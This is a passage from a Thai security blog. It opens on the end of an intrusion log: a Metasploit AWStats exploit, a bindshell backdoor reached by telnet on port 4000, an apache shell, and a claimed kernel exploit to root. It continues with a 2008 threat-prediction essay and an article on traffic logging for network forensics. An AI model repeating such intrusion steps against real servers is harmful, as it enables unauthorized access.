./bindshell
Daemon is starting…OK, pid = 1648
Caught interrupt, exit connection? [y/n] y
[*] Exiting Reverse Handler.
msf awstats_configdir_exec(cmd_unix_reverse) > exit
telnet เข้าไปที่พอร์ต backdoor
# telnet 192.168.1.204 4000
Trying 192.168.1.204…
Connected to www.sran.net (192.168.1.204).
Escape character is ‘^]’.
sh-2.05b$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-2.05b$ sh-2.05b$ ls -al
total 204
drwxr-xr-x 19 root root 4096 Dec 16 15:18 .
drwxr-xr-x 19 root root 4096 Dec 16 15:18 ..
-rw-r–r– 1 root root 0 Dec 16 15:18 .autofsck
drwxr-xr-x 2 root root 4096 Nov 28 12:23 bin
drwxr-xr-x 3 root root 4096 Nov 28 10:53 boot
drwxr-xr-x 21 root root 118784 Dec 16 15:19 dev
drwxr-xr-x 47 root root 4096 Dec 16 15:19 etc
drwxr-xr-x 5 root root 4096 Dec 1 11:25 home
drwxr-xr-x 2 root root 4096 Oct 7 2003 initrd
drwxr-xr-x 8 root root 4096 Nov 28 12:22 lib
drwx—— 2 root root 16384 Nov 28 05:45 lost+found
drwxr-xr-x 2 root root 4096 Sep 8 2003 misc
drwxr-xr-x 4 root root 4096 Nov 28 11:12 mnt
drwxr-xr-x 2 root root 4096 Oct 7 2003 opt
dr-xr-xr-x 60 root root 0 Dec 16 10:18 proc
drwxr-x— 3 root root 4096 Dec 16 13:13 root
drwxr-xr-x 2 root root 8192 Nov 28 12:23 sbin
drwxrwxrwt 4 root root 4096 Dec 16 16:08 tmp
drwxr-xr-x 15 root root 4096 Nov 28 10:50 usr
drwxr-xr-x 18 root root 4096 Nov 28 10:56 var
sh-2.05b$ sh-2.05b$ cd /var/tmp
sh-2.05b$ sh-2.05b$ ls -al
total 8
drwxrwxrwt 2 root root 4096 Dec 15 14:59 .
drwxr-xr-x 18 root root 4096 Nov 28 10:56 ..
sh-2.05b$ sh-2.05b$ uname -a
Linux app.sran.org 2.4.22-1.2115.nptl #1 Wed Oct 29 15:20:17 EST 2003 i586 i586 i386 GNU/Linux
เมื่อได้ user ในระบบเป็น apache แล้วผมจึงพยายามต่อไปเพื่อให้ได้สิทธิ์ของ root การที่ระบบนี้ใช้ Linux kernel เวอร์ชั่นเก่าทำให้ไม่ยากที่จะหา exploit เพื่อโจมตีช่องโหว่ใน kernel และผมก็ได้ root ในที่สุด
นนทวรรธนะ สาระมาน
Nontawattana Saraman
SRAN Dev
ใกล้หมดปีไปอีกครั้งแล้วนะครับ ใครตั้งใจจะทำอะไรไว้ ยังไม่ได้ทำภายในปีนี้ก็ขอให้เรียบๆทำกันไว้ เวลานั้นไม่เคยคอยใคร พอใกล้หมดปี ก็มักจะมีคำทำนายในเรื่องต่างๆ เช่นกันในปีหน้า ภัยคุกคามในรูปแบบใหม่ๆ ที่อาจจะเกิดขึ้นในปี 2008 จะเป็นอย่างไรบ้างลองรับฟังกันดูเผื่อไว้ว่าจะช่วยในการป้องกัน กันได้ทัน เท่าที่ผ่านมาได้ค้นหาข้อมูลเกี่ยวกับภัยคุกคามทางอินเตอร์เน็ทในรูปแบบ ใหม่ๆ พบว่ามีหลายสำนักได้ตั้งข้อสังเกตไว้พอสมควร โดยเฉพาะเจ้าแรกที่กล้าออกมาทำนาย นั้นคือ Mcafee ยักษ์ใหญ่ในวงการ IT Security ระดับโลก ในทีมงาน SRAN ก็ได้เขียนทำนายไว้เช่นกัน ซึ่งมีความใกล้เคียงกับทาง Mcafee และคิดว่าในปี 2008 ภัยคุกคาม จะเน้นในเรื่องความเป็นส่วนตัวมากขึ้น ข้อมูลที่เป็นข้อมูลส่วนบุคคล ความประมาทในการใช้งานของ User รวมถึงอาชญากรรมคอมพิวเตอร์ ในรูปแบบต่างๆ ที่ทวีความซับซ้อน จะแบ่งหมวดหมู่ภัยคุกคามได้ดังนี้ครับ
กลุ่มภัยคุกคามที่พบในปี 2008
กลุ่มที่ 1 กองทัพ botnet ตัวกลางเชื่อมต่อภัยคุกคามในรูปแบบต่างๆ
กลุ่มที่ 2 ช่องโหว่ของระบบปฏิบัติการ
กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท
กลุ่มที่ 1 กองทัพ Botnet ตัวกลางเชื่อมต่อภัยคุกคามในรูปแบบต่างๆ
ภัยคุกคามอันดับที่ 1 Storm Worm : อาชญกรทางคอมพิวเตอร์ จะใช้เทคนิคการสร้าง Storm Worm เพื่อกลบเกลื่อนร่องรอย สร้างสายพันธ์ของ worm ในการเปลี่ยนโค้ดที่ทำให้ระบบซอฟต์แวร์ Anti virus ไม่สามารถตรวจจับได้ ซึงการเกิด Storm Worm นั้นเป็นการติดโปรแกรมไม่พึ่งประสงค์ บนเจตนาของผู้บุกรุกที่สร้างขึ้น โปรแกรมไม่พึ่งสงค์เรียกอีกอย่างหนึ่งว่า “malware” คือซอฟต์แวร์ที่สูญเสีย C (Confidentiality) I (Integrity) และ A (Availability) อย่างใดอย่างหนึ่ง หรือ ทั้งหมด จนทำให้เกิดเป็น Virus , Worm , Trojan , Spyware , Backdoor และ Rootkit ซึ่ง Storm worm เป็นลักษณะการแพร่กระจายสายพันธ์ ที่มีการเปลี่ยนแปลงโค้ด ทำให้เกิดความเสียหายกับเครื่องที่ติด worm เหล่านี้ ผลลัพธ์ของ Storm worm คือเครื่องที่ติด worm ชนิดเหล่านี้จะถูกเรียกว่า “Zombie” ที่พร้อมที่จะควบคุมให้ทำการใดการหนึ่ง เช่น การส่ง Spam , การโจมตีชนิดที่เรียกว่า DDoS/DoS เป็นต้น หาก Zombie จำนวนมากกว่า 1 เครื่อง ก็เรียกว่า Botnet นั้นเอง ในปี 2008 กองทัพ Botnet ที่พร้อมใช้งานจะมีอัตราที่สูงขึ้น และอาจมีการซื้อขาย กองทัพ Botnet ในกลุ่มอาชญกรคอมพิวเตอร์ เพื่อใช้โจมตีเครือข่ายเครือข่ายขนาดใหญ่ ได้ต่อไป
ภัยคุกคามอันดับที่ 2 : Parasitics Malware เป็นไวรัสที่แก้ไขไฟล์ที่อยู่ในดิสก์ และใส่โค้ดเข้าไปในไฟล์ ในปีที่ผ่านมาจะพบว่าผู้เขียนไวรัสจะใช้วิธีนี้สร้างไวรัสชนิดต่างๆ ตัวอย่างเช่น Grum , Virut และ Almanahe คาดว่าจะมี Parasitics Malware เติบโตขึ้นในปี 2008 และการฝั่งโค้ดเข้าไปในไฟล์ จากเดิมเน้นการทำลายเครื่องให้เกิดความผิดปกติ ก็จะทำฝั่งตัวควบคุมเครื่อง อาจเป็น Backdoor , Trojan , หรือ Script บางอย่างที่ทำให้เครื่องติด Parasitic Malware ตกเป็นทาส (Zombie) ได้ซึ่งการเกิด Zombie หลายๆเครื่อง ก็จะกลายเป็นกองทัพ Botnet ที่พร้อมใช้งานในการโจมตีต่อไป
สัดส่วนการเจริญเติบโตจากภัยคุกคามชนิด Parasitics Malware จาก Mcafee
ภัยคุกคามอันดับที่ 3 : การยึดระบบเสมือนจริง (Virtualization) ผู้ สร้าง Malware พยายามค้นหาช่องโฆว่ในระบบ Virtualization มากขึ้นการที่ได้ควบคุมระบบปฏิบัติการเสมือน ในการสร้างกองทัพ Botnet และเพื่อการแพร่กระจายการติดเชื้อแบบ Storm worm ขึ้น ทั้งนี้เพื่อสร้างจำนวน Zombie แบบไร้ตัวตนให้มากขึ้น Virtualization เป็นเทคโนโลยีที่ช่วยให้สามารถแบ่งพาทิชันคอมพิวเตอร์ให้สามารถรันซอฟต์แวร์ และแอพพลิเคชันในจำนวนมากๆ หรือแม้แต่รันระบบปฏิบัติการได้หลายๆ ตัวพร้อมกันซึ่งพื้นที่ที่แบ่งพาทิชันขึ้นนั้นมักรู้จักกันว่า “Virtual Space” หรือ “Container” โดยปัจจุบัน Virtual lization Technology มีการใช้งานกันมากขึ้น
ช่องโหว่ที่ค้นพบบนระบบเสมือน
ภัยคุกคามอันดับที่ 4 FastFlux เป็นเทคนิคทาง DNS ที่ใช้โดย Botnet เพื่อซ่อนเว็บไซต์ที่ทำหน้าที่ให้บริการ Phisihing และมัลแวร์ ที่อยู่เบื้องหลังเครือข่ายของโฮสต์ที่ถูกบุกรุกทำตัวเป็น Proxy ที่มีการเปลี่ยนแปลงตลอดเวลา รวมถึงเครือข่ายแบบ Peer-to-Peer รวมกันหลายเครือข่าย ใช้เทคนิคต่างๆ ได้แก่ การใช้คำสั่งและการควบคุมแบบกระจาย (Distributed) การใช้ Load Balancing และการเปลี่ยนเส้นทาง proxy เพื่อทำให้การเครือข่ายมัลแวร์ยากต่อการถูกตรวจพบและการป้องกัน Storm Worm เป็นหนึ่งในมัลแวร์ที่ใช้เทคนิคเหล่านี้ผู้ใช้อินเทอร์เน็ตอาจพบการใช้ fast flux ในการโจมตี phishing ที่มีเชื่อมโยงกับกลุ่มอาชญากร รวมถึงการโจมตี MySpace ด้วยในปี 2008 นี้
ในปี 2008 อาจมีอาชีพใหม่ ในการค้าขาย กองทัพ botnet ในตลาดอินเตอร์เน็ทก็เป็นได้ ทั้งนี้กองทัพ botnet อาจจะมีมากในประเทศที่พึ่งมีการเชื่อมต่ออินเตอร์เน็ท และระบบเครือข่ายใหม่ๆ ที่ยังขาดการป้องกันภัยที่ดี อีกทั้งจะมีจำนวนมากขึ้นสำหรับประเทศที่ยังไม่มีกฎหมายเอาผิดกับผู้ใช้ botnet ซึ่งผลที่เกิดจากการโจมตีของ Botnet ไม่ใช่แค่เพียงการส่ง Spam , DDoS/DoS , Virus/worm อีกต่อไป แต่เป็นภัยคุกคามอื่น ที่คาดไม่ถึงว่าจะเกิดขึ้นก็เป็นไปได้
จำนวน botnet ในแต่ละวัน
กลุ่มที่ 2 ภัยคุกคามจากช่องโหวที่พบบนระบบปฏิบัติการ ่
ภัยคุกคามอันดับ 5 : Operating System Vulnerability : ระบบปฏิบัติการที่เรารู้จักกันดี ไม่ว่าเป็น Linux / BSD , MaC OS หรือ Windows Microsoft นำไปใช้บน Appliance ต่างๆ รวมไปถึงระบบมือถือ ที่ในปีหน้า 2008 นี้เองจะเห็นว่าคนทั่วไปพกมือถือที่มีมัลติมีเดีย และสามารถท่องโลกอินเตอร์เน็ทได้ สามารถทำอะไรๆ ที่ต้องการได้ ทำงานแทน Notebook ได้ ไม่ว่าเป็นมือถือที่ระบบปฏิบัติการของ Mac ที่ชื่อว่า iPhone หรือพวก Windows Mobile ซึ่งในปีหน้าอาจพบช่องโหว่ต่างๆ ที่เกิดขึ้นบนเครื่องมือถือมากขึ้น ไม่ว่าเป็นพวก Virus/worm, Spam เหล่านี้สร้างความเสียหายไม่น้อยกว่าเครื่อง PC ที่ใช้กันทั่วไป ที่เป็นเช่นนี้ก็เนื่องจาก Application ที่มากขึ้น บนตัวระบบ Operating System ทำให้ภาพรวมการใช้งาน จะพบช่องโหว่มาขึ้นจาก Application มากกว่า OS ก็ตาม หลายคนยังตั้งข้อสังเกตถึงระบบปฏิบัติการใหม่ของ Windows Microsoft ที่ชื่อว่า Vista ที่ยังมีช่องโหว่และไม่ได้รับการแก้ไขให้ทันเวลา ซึ่งจะขยายผลต่อให้เกิดภัยคุกคามใหม่ที่ฝั่งเข้าสู่ระบบ และสร้างเป็น Zombie ต่อไปได้เช่นกัน
กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท
กลุ่มที่ 3 ภัยคุกคามจากความประมาทจากการใช้ข้อมูลส่วนตัวบนอินเตอร์เน็ท ซึ่งส่วนตัวผมถือว่าเป็นกลุ่มภัยคุกคามประจำปี 2008 เนื่องจากการเจริญเติบโตการใช้งานอินเตอร์เน็ทที่มากขึ้นและความซับซ้อนของ รูปแบบการใช้งาน มีผลให้เกิดอาชญกรรมเกี่ยวกับการขโมยข้อมูลส่วนตัว การนำข้อมูลส่วนตัวมาเผยแพร่ โดยไม่ได้รับอนุญาติ และการหลอกหลวงทางเทคโนโลยีต่างๆ ที่เกี่ยวข้องกับการใช้งาานอินเตอร์เน็ท ส่วนบุคคลมากขึ้นนั่นเอง สรุปว่ากลุ่มนี้ เหยื่อมักเกิดจาก ความรู้เท่าไม่ถึงการณ์ การทำนายภัยคุกคามที่อาจเกิดขึ้นในปี 2008 ในกลุ่มที่ 3 นี้ก็เพื่อป้องกันไม่สิ่งเหล่านี้เกิดกับตนเอง และคนใกล้ตัวให้พึ่งระวังได้
ภัยคุกคามอันดับที่ 6 : ซอฟต์แวร์ไม่พึ่งประสงค์จากการใช้สนทนาออนไลท์ (Instant Malware) เป็นการใช้งานที่ประมาทของผู้ใช้เอง ที่อาจจะดาวโหลดซอฟต์แวร์จาก คู่สนทนาที่ไม่รู้จัก หรือรู้จัก มีไฟล์แนบมา หรือที่พบมากขึ้นคือ ในรูปแบบของ Flash ที่สามารถเอ็กซิคิวท์ตัวเองได้ มาพร้อมกับโปรแกรมประเภท Instant Messaging
ช่องโหว่ที่ค้นพบจากการใช้งาน IM ในแต่ละปี
ีภัยคุกคามอันดับที่ 7 : บริการเกมส์ออนไลน์ (Online Gaming) ผู้ใช้บริการอาจตกเป็นเหยื่อ เนื่องจากของในเกมส์สามารถซื้อขายกันเงินจริงๆได้ ตัวอย่างเห็นได้จากโทรจันที่ขโมยรหัสผ่านของบริการเกมส์ออนไลน์ ในปี 2007 จะมีอัตราเติบโตเร็วกว่าจำนวนของโทรจันที่มีเป้าหมายกับผู้ใช้บริการของ ธนาคาร
ภัยคุกคามอันดับที่ 8 : สังคมออนไลท์แบบเปิด (Social Networking) กับการใช้ข้อมูลบน Web 2.0 เป็นที่รู้กันว่าสังคมแบบเปิดบนโลกอินเตอร์เน็ทมีจำนวนมากขึ้นจากเทคโนโลยี Web 2.0 สิ่งที่ตามมา ผมเคยทำนายไว้ในบท 7 ภัยคุกคามปี 2007 ไปแล้วว่าการควบคุม Social Networking เป็นเรื่องยาก เพื่อเนื้อหาเกิดจากผู้ใช้งานทุกคน ทุกคนมีส่วนร่วมในการสร้างเนื้อบนเว็บไซด์ การควบคุมเรื่องนี้เป็นเรื่องยาก เรามักได้ยินข่าวการโพสเรื่องราวการหมิ่นประมาทสิทธิส่วนบุคคล การกล่าวร้าย การกล่าวเท็จ ปิดเบือนข้อเท็จจริง บน Web 2.0 รวมถึงพวก Web Board อยู่ตลอดทั้งปี ไม่ว่าเป็น Youtube , Camfroge , Myspace.com เป็นต้น หรือแม้เว็บไทยของเราก็มีจำนวนไม่น้อยที่เกิดเรื่องเหล่านี้ การควบคุมทัศนะคติแต่บุคคลที่เข้ามา Post เนื้อหาในเว็บเป็นเรื่องที่ควบคุมลำบาก แต่เป็นเรื่องไม่ยากในการทราบที่มาที่ไปของการ Post สิ่งเหล่านี้ จึงทำให้มีการหลอกหลวงจากความรู้เท่าไม่ถึงการณ์จากการใช้งาน Web 2.0 มากขึ้น และผลการคาดการแล้วพบว่าอาจเกิดมีผู้โจมตีจะใช้เวบไซต์ที่ใช้เทคโนโลยี Web 2.0 เพื่อแพร่กระจายมัลแวร์และรวบรวมข้อมูลต่าง ๆ ที่ต้องการจากเว็บเพื่อค้นหาข้อมูลที่ผู้ใช้แชร์ไว้เพื่อทำให้การโจมตีดู เหมือนจริงมากยิ่งขึ้น
ภัยคุกคามอันดับที่ 9 การหลอกลวงจากการใช้เทคโนโลยี VoIP : ในปีคศ.2007 จำนวนของช่องโหว่ที่รายงานเกี่ยวกับ VoIP มากกว่ารายงานช่องโหว่ในปีคศ.2006 ถึงสองเท่า นอกจากนี้ยังมีรายงานเกี่ยวกับการโจมตีที่เรียกว่า vishing และ phreaking ซึ่งอาจเกิด Spam บน VoIP และการหลอกลวงจาก Botnet ที่เป็นเสียงมากับมือถือโดยใช้เทคนิค (Social Engineering) ได้เช่นกัน
VoIP-Voice Over IP หรือที่เรียกกันว่า “VoIP Gateway” หมายถึง การส่งเสียงบนเครือข่ายไอพี เป็นระบบที่แปลงสัญญาณเสียงในรูปของสัญญาณไฟฟ้ามาเปลี่ยนเป็นสัญญาณดิจิตอล คือ นำข้อมูลเสียงมาบีบอัดและบรรจุลงเป็นแพ็กเก็ต ไอพี (IP) แล้วส่งไปโดยมีเราเตอร์ (Router) ที่เป็นตัวรับสัญญาณแพ็กเก็ต และแก้ปัญหาบางอย่างให้ เช่น การบีบอัดสัญญาณเสียงให้มีขนาดเล็กลง การแก้ปัญหาเมื่อมีบางแพ็กเก็ตสูญหาย หรือได้มาล่าช้า (delay)การสื่อสารผ่านทางเครือข่ายไอพีต้องมีเราเตอร์ (Router) ที่ทำหน้าที่พิเศษเพื่อประกันคุณภาพช่องสัญญาณไอพีนี้ เพื่อให้ข้อมูลไปถึง ปลายทางหรือกลับมาได้อย่างถูกต้องและอาจมีการให้สิทธิพิเศษก่อนแพ็กเก็ตไอพี อื่น (Quality of Service : QoS) เพื่อการให้บริการที่ทำให้เสียงมีคุณภาพ
นอกจากนั้น Voice over IP (VoIP) ยังเป็นการส่งข้อมูลเสียงแบบ 2 ทางบนระบบเครือข่ายแบบ packet-switched IP network. ซึ่งข้อมูลนี้จะถูกส่งผ่านเครือข่ายอินเตอร์เน็ตสาธารณะเพื่อสื่อสารระหว่าง VoIP ด้วยกัน โดยที่ยังคงความเป็นส่วนตัวไว้ได้
เทคโนโลยีนี้ยังใหม่และยังขาดวิธีที่ใช้ในการป้องกัน คาดว่าจะมีการโจมตี VoIP เพิ่มขึ้นร้อลละ 50 ในปีคศ.2008 หรือแม้แต่กระทั่งมัลแวร์ (Malware) ที่โจมตี VoIP แพร่กระจายสู่วงกว้าง
ภัยคุกคามอันดับ 10 :การติดกับดักทางข้อมูล (Information pitfall) เรื่องนี้ผมถือว่าเป็นเรื่องใหญ่ และเคยเขียนบทความเรื่องนี้ในเดือนเมษายน ปี 2007 ที่บอกว่าเป็นเรื่องใหญ่เพราะว่าเป็นการสร้างความเชื่อให้เกิดขึ้นกับบุคคล การสร้างกลยุทธการตลาดเข้ามาเพื่อสร้างภาพ สร้างความเชื่อ หากเป็นความเชื่อที่เป็นสิ่งที่ถูกต้อง และมีคุณธรรม ก็ดีไป แต่หากเป็นการสร้างความเชื่อ เพื่อหลอกหลวง ก็จะทำให้เกิดความเสียหายได้เช่นกัน ตัวอย่างเราจะพบว่า Scam Web , Phishing Web , Adsware ที่ติดมากับ Web ถึงแม้จะจำนวนน้อยลงเพราะคนเริ่มตะหนักถึงภัยคุกคามที่ตามจากเข้าเว็บพวกนี้ แต่ก็ยังมีจำนวนคนไม่น้อยที่ยังตกเป็นเหยื่ออยู่ตลอดทั้งปี สิ่งนี้จะจางหายไปกับกับระบบป้องกันภัยทั้งด้านระบบป้องกันภัยทางเครือข่าย (Network) และระบบป้องกันภัยระดับเครื่องคอมพิวเตอร์ (Host) ที่มีความทันสมัยและฉลาดในวิธีการป้องกันก็ตาม การสร้างค่านิยม บนความเชื่อ ถือว่ามีความเกี่ยวพันกับความมั่นคงของชาติในอนาคต มันอาจเป็นเรื่องพูดได้ยากในขณะนี้ เพราะทุกคน ยินดีต้อนรับเทคโนโลยีที่มาจากต่างประเทศ โดยไม่คิดว่าผลสืบเนื่องในอนาคต ซึ่งอาจนำมาถึงการตกเป็นอนานิคมทางเทคโนโลยี (Information Technology Colonization) โดยยินยอมพร้อมใจก็ได้
ความเชื่อ จากค่านิยม ที่คิดว่าต่างประเทศดีกว่าเรา เป็นเรื่องยากที่แก้ไข แต่ไม่สายที่ดำเนินการ ถึงเวลาที่เราทุกคนต้องสร้างความเชื่อมั่นว่า คนไทยไม่แพ้ไคร ไม่ได้ด้อยไปกว่าใครในโลกนี้
สวัสดีปีใหม่ครับ
นนทวรรธนะ สาระมาน
Nontawattana Saraman
… หากเราสามารถย้อนเวลาได้ เราจะทำอะไร? แน่นอนเราคงทำในสิ่งที่เราตัดสินใจผิดพลาดมาในอดีต แต่ในความเป็นจริงเราไม่สามารถย้อนเวลาได้ นอกจากจะยอมรับในการตัดสินใจของเราเอง …
ในสมัยก่อนย้อนเวลาไป ในปี 1985 หรือ ปี พศ. 2528 เคยมีหนังเรื่องหนึ่งที่ผมชอบมาก คือ Back To The Future ภาค 1 นำแสดงโดย Michael J. Fox ตัวพระเอกในเรื่องเองสามารถย้อนเวลากลับไปได้ โดยใช้รถยนต์ ที่เรียกว่า เป็น Time Machine เป็นหนังตลก และสนุก มีสีสัน รวมถึงมีฉากที่สวยๆ น่ารัก สมควรแก่การสะสม
การสืบค้นร่องรอยเพื่อพิสูจน์หลักฐานทางข้อมูลสารสนเทศ นี้ ศัพ์ทางภาษาอังกฤษเรียกว่า Chain of Custody หรือ Chain of Evidence ที่มีความสอดคล้องกับสิ่งที่ต้องการรู้ เพื่อรับทราบถึงเหตุปัจจัย Network Time Machine คือศัพท์ที่เกี่ยวข้องกับวิธีการย้อนเวลาเพื่อสืบหาต้นเหตุของหลักฐาน โดยใช้เทคโนโลยีบนระบบเครือข่าย ผมจึงระบุศัพท์คำนี้ขึ้น โดยไม่ได้สนใจพจนานุกรมทางคอมพิวเตอร์ อีกแล้ว ..
ในโลกระบบเครือข่ายคอมพิวเตอร์แล้ว เมื่อเกิดเหตุการณ์ไม่คาดฝันขึ้น และเราต้องการทราบถึงที่มาที่ไป หรือที่เรียกว่า กระแสของเหตุปัจจัย หรือ อิทัปปัจจยตา สิ่งใดมีเพราะมีเหตุปัจจัยให้มี ส่ิงใดไม่มีเพราะไม่มีเหตุปัจจัยให้มี ไม่มีอะไรมีหรือไม่มีโดยตัวของมันเอง “สิ่งนี้เกิดสิ่งนี้จึงเกิด สิ่งนั้นไม่เกิดสิ่งนั้นจึงไม่เกิด”
เรามักจะนึกถึงการเก็บบันทึกข้อมูลจราจร หรือภาษาอังกฤษที่เรียกว่า Log จาก Data Traffic เราถึงจะวิเคราะห์ย้อนหลังไปได้ ว่ามีเหตุการณ์อะไรเกิดขึ้น ซึ่งเป็นที่มาของศาสตร์ที่เรียกว่า Network/Computer Forensics นั้นเอง แน่นอนการเก็บบันทึกเหตุการณ์เหล่านั้นเป็นไปตามเนื้อผ้า เก็บอย่างที่เห็นว่าควรจะเป็น หากไม่มีการแก้ไขข้อมูลจากผู้ไม่หวังดี เสียก่อน
บทความนี้ส่วนหนึ่ง ผมเขียนขึ้นเพื่อสร้างความเข้าใจถึงกรรมวิธีการเก็บข้อมูลจราจร (Data Traffic) อย่างน้อยคงได้ประโยชน์สำหรับการนำไปใช้ประยุกต์กับ การเก็บข้อมูลตาม พรบ. ว่าด้วยการกระทำผิดทางคอมพิวเตอร์ ที่ประกาศใช้ เมื่อไม่นานนี้
กรรมวิธีในการเก็บข้อมูลจราจร มีด้วยกัน 3 วิธี แบ่งได้ดังนี้
1. ข้อมูลที่เกิดขึ้นบนระดับเครื่อง (Local Host Log) ไม่ว่่าจะเป็นระดับเครื่องลูกข่าย (Client) หรือ เครื่องแม่ข่าย (Server) การเก็บในหัวข้อนี้เป็นเรื่องละเอียดอ่อน และมีคุณค่าในการทำ Computer Forensics หรือที่เรียกว่า การสืบหาหลักฐานทางคอมพิวเตอร์ เรามักจะเก็บ Log จาก System , Application และ User เป็นหลัก ในแต่ละเครื่องย่อมมี Application ที่แตกต่างกัน ส่วน User แล้วจะมีประโยชน์มากสำหรับเครื่องที่เป็นแม่ข่าย (server) การเก็บบันทึกข้อมูลจราจรขึ้นอยู่กับระบบปฏิบัติการ และมีซอฟต์แวร์ทุ่นแรงมาแล้วจากระบบปฏิบัติการ โดยเฉพาะระบบปฏิบัติการ Windows ซึ่งมี GUI ที่ดูแล้วสะดวกในการใช้งาน ทั้งหมดนี้ขึ้นตรงกับเวลา (Time) ที่เป็นตัวกำหนดชะตาบนเครื่องนั่นๆ ไม่ว่าเป็น
System มีความผิดปกติ จากอะไร ช่วงเวลาใด
Application ใดที่ใช้งาน บนเครื่องคอมพิวเตอร์ของเรา ก็ได้แก่ Web Browser Application ที่ใช้ก็ได้แก่ Firefox หรือ IE , Chat , Mail Client POP3 ไม่ว่าเป็น Outlook , Thunderbird เป็นต้น เราต้องพิจารณาการเก็บบันทึกเหตุการณ์ตาม ช่วงเวลาที่ใช้ Application ต่างๆ ที่กล่าวมา รวมถึงการติดต่อสื่อสารบน Application จากเครื่อง สู่ ระบบเครือข่าย (Network) ซึ่งอาจต้องกล่าวในขั้นตอนต่อไป เป็นความสัมพันธ์ ชนิด 3 in 3 out หากต้องพิสูจน์หาหลักฐาน ต้องพิจารณาการเชื่อมโยงเครือข่าย จะเข้าสู่แนวทางการปฏิบัติแบบ Network Forensics จากความสัมพันธ์ส่วนนี้เอง
2. การบันทึกข้อมูลจราจรระดับเครือข่ายคอมพิวเตอร์ (Network Data Traffic) การเก็บบันทึกเหตุการณ์ส่วนนี้ มักดูจากอุปกรณ์เครือข่าย ไม่ว่าเป็นการอุปกรณ์ที่ใช้สำหรับวิเคราะห์ปัญหาเครือข่าย และอุปกรณ์ดักจับข้อมูลต่างๆ ได้แก่ อุปกรณ์ Sniffer หรือ IDS (Intrusion Detection System) ที่ปรับแต่งการตรวจจับให้รองรับข้อมูลจราจรบางสิ่งบางอย่าง อย่างจงใจ จากผู้ดูแลระบบ ซึ่งในส่วนนี้เป็นที่มาการสร้างระบบเฝ้าระวังภัยคุกคามทางความมั่นคงข้อมูลอย่าง SRAN (Security Revolution Analysis Network) ขึ้น ซึ่งการบันทึกข้อมูลจราจรจากระดับเครือข่าย นี้ไม่ละเอียดเหมือนกรรมวิธีที่หนึ่ง แต่จะเห็นภาพรวมเหตุการณ์ ที่มีการติดต่อสื่อสารกันได้แบบเชิงกว้าง ไม่ลึก แต่พอทราบถึงเหตุปัจจัยการเกิดเหตุ นั่นเอง ซึ่งวิธีการนี้ สามารถตรวจจับตาม Protocol Application ที่ใช้งานทั้งในเครือข่าย (LAN Technology) สู่ภายนอกเครือข่าย (WAN Technology) ได้ Protocol ที่สนใจก็ได้แก่
Routing Protocol เส้นทางการลำเลียงข้อมูล ผ่านจากตัวเครื่องคอมพิวเตอร์ ในระดับ Host ไปสู่ระดับเครือข่าย (Network) และ ระหว่างเครือข่ายกับเครือข่าย (Network to Network) ช่วงเวลาที่เกิดการลำเลียงข้อมูล ระหว่าง IP ต้นทาง (Source IP) และ IP ปลายทาง (Destination) , Time Date
ส่วน Application Protocol ใกล้เคียงกับ วิธีที่ 1 แต่แทนที่อยู่ในระดับเครื่องก็จะมองถึง ข้อมูลวิ่งผ่านเข้าออก บนระบบเครือข่ายแทน เช่น Web (HTTP) , Mail (SMTP, POP3 , IMAP) , IM (Chat) , P2P , FTP , Telnet เป็นต้น ช่วงเวลาที่บันทึก (Time Date) ส่วน Protocol ที่มีการเข้ารหัสไว้ เช่น SSL , SSH สามารถรู้ได้เฉพาะ IP ต้นทาง และ IP ปลายทางในการเชื่อมต่อ แต่ระหว่างเนื้อหาในการกระทำไม่สามารถรู้ได้ทั้งหมด ยกเว้นจะใช้เทคนิคพิเศษ ซึ่งทำตัวคล้ายๆ กับ Man in the Middle เป็นต้น ในที่นี้ผมไม่ขอกล่าวถึงการตรวจจับชนิดการเข้ารหัสผ่าน Application Protocol ดังกล่าว ซึ่งทั้งนี้เราก็สามารถรู้ถึงข้อมูล (Information) ที่วิ่งเข้าและออกบนเครือข่ายคอมพิวเตอร์ ได้ระดับหนึ่ง
ลักษณะการเก็บ เช่น Web บันทึก IP ที่ใช้งาน Web ปลายทาง และบันทึกตามเวลา , Mail IP ต้นทางที่ส่ง mail , ปลายทางรับ mail , หัวข้อ mail และ วันเวลาที่ใช้ Application นี้ เป็นต้น
3. การเก็บบันทึกข้อมูลจราจรทั้งหมด โดยเชื่อมต่อกับการเก็บบันทึกกลาง หรือที่เรียกว่าการทำ SIM (Security Information Management) คือ เก็บบันทึก Log จากหัวข้อที่ 1 ทั้งหมด ส่งเข้าสู่ศูนย์กลาง และหัวข้อที่ 2 แต่เปลี่ยนเป็นเก็บบันทึกตามอุปกรณ์เครือข่าย เช่น Router , Firewall , IDS/IPS , UTM (Unified Threat Management) เป็นต้น
ส่วนการเก็บบันทึกการใช้งานระดับ User เรามักมองหาเทคโนโลยี เช่น Radius คือระดับ WAN Technology ส่งออกไป และในระดับ LAN Technology ก็เป็นระบบ NAC (Network Access Control) เป็นต้น ซึ่งทั้งหมดนี้สามารถ ส่ง Log ที่เกิดขึ้นให้กับ SIM ได้ และ SIM จะใช้กลไกในการทำ Correlation Log การเปรียบเทียบความสัมพันธ์ของ Log แต่ละชนิดให้จัดระเบียบ รวบรวมตามหมวดหมู่สำหรับผู้ดูแลระบบต่อไป วิธีนี้เป็นวิธีที่ละเอียดที่สุด แต่ ในความเป็นจริงแล้วทำยากที่สุดเช่นกัน เพราะต้องอาศัย ผู้เชี่ยวชาญ ที่รู้จักชนิดการส่ง Log ในแต่ละอุปกรณ์ Application และความแตกต่างของรุ่น ยี่ห้อ ทั้งระดับ Host และ Devices อย่างชำนาญ ถึงจะส่ง Syslog มาที่ SIM บริหารจัดการได้ ในส่วนตัวผมแล้วคิดว่าระบบนี้ คงเป็นไปได้ยากในเมืองไทย เนื่องจากความมากด้วยบริษัท SI ที่ขาดความรู้ในเชิง Implement จริง ทำให้ผลกระทบว่าซื้อไปแล้ว อาจไม่คุ้มค่า ได้
